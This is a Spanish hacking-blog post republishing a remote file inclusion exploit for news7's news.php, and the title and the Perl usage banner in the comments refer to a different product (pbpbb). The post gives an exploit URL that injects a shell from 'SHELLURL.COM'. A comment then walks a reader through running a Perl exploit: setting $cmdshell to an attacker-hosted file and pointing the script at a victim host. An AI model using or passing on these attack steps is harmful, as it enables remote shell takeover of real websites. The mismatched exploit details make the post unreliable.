pbpbb archive for search engines Remote File Include Vulnerability

Do, 15/10/2006 - 18:53 — OeX

#=======================================================================
news7 <=  (news.php) Remote File Inclusion Exploit

=======================
##=======================================================================
========================
#Bug in :news.php 
#
#
#Vlu Code :
#--------------------------------
#
#require($news7["functions"]);
#
#
#=======================================================================
=========================
#
#Exploit :
#--------------------------------
#
#htpp://sitename.com/[scerpitPath]/index.php?news7["functions"]=http://SHELLURL.COM
#
#
#
#=======================================================================
=========================
#Discoverd By : MoHaNdKo
#
#Conatact : xp1o (at) msn (dot) com [email concealed]
#or
#
# wWw.xP10.CoM & wWw.TRyaG.CoM
#
#Greetz :ToOoFA &( abo nora ) & 3abdalah & KaBaRa & mahmood_ali & ThE-WoLf-KsA & abu shad & v1per-haCker & MR.WOLF & 
#
#abu melaf & mohagr22 & metoovet & fuck_net  & hitler-jeddah & El3alMy & 
#
#
# and all member on xp10.com and tryag.com and lezr.com
========================================================================
==========================

vendor:

http://www.n7studios.co.uk/work/programs/news7.zip

593 lecturas

Comentarios

Do, 13/05/2007 - 12:05 — www.ralagofi0.com (no verificado)

explicacion

no se si lo tendras por ahi poero deberias poner como compilar el xploit pa que la gente lo entienda..

responder

Do, 13/05/2007 - 14:02 — OeX

Compilar exploits

hola www.ralagofi0,com,

En breve intentare hacer un pequeÃ±o manual de como compilar un exploit, ya lo publicare en la secciÃ³n de tÃ©cnicas de hacking, cuando este listo, gracias por la idea

de todos modos, este exploit esta escrito en perl, como se puede ver en la primera linea del exploit.

#!/usr/bin/perl

El lenguaje perl, no necesita compilaciÃ³n, pero si requiere tener un interprete de perl, en linux suele venir instalado con la propia distribuciÃ³n, en windows tienes que instalarlo aparte, pero, eso si, es gratis.

para utilizar este exploit solo tienes que:
0.- tener instalado un interprete de perl.
1.- copia el exploit en un archivo de texto, pero sin formato, tipo vim, gedit, o notepad para windows
2.- modificas la linea 25 $cmdshell="http://attacker.com/cmd.txt"; a tu gusto y lo guardas.
3.- lo ejecutas y sigues las indicaciones del exploit

OeX:/home/oex# perl exploit.perl

#################################################
#                                                                                                          #
# pbpbb archive for search engines     Remote File Include Vulnerability      #
# Bug found By : Ashiyane Corporation                                                    #
# Email: nima salehi    nima[at]ashiyane.ir                                               #
# Web Site : www.Ashiyane.ir                                                                  #
#                                                                                                         #
#################################################

 Usage: Ashiyane.pl [host] [path]
 EX : Ashiyane.pl www.victim.com /path/

si tienes dudas puede preguntar en el foro

pd hazte usuario q es un minuto

OeX

responder

babilonics.com

Menu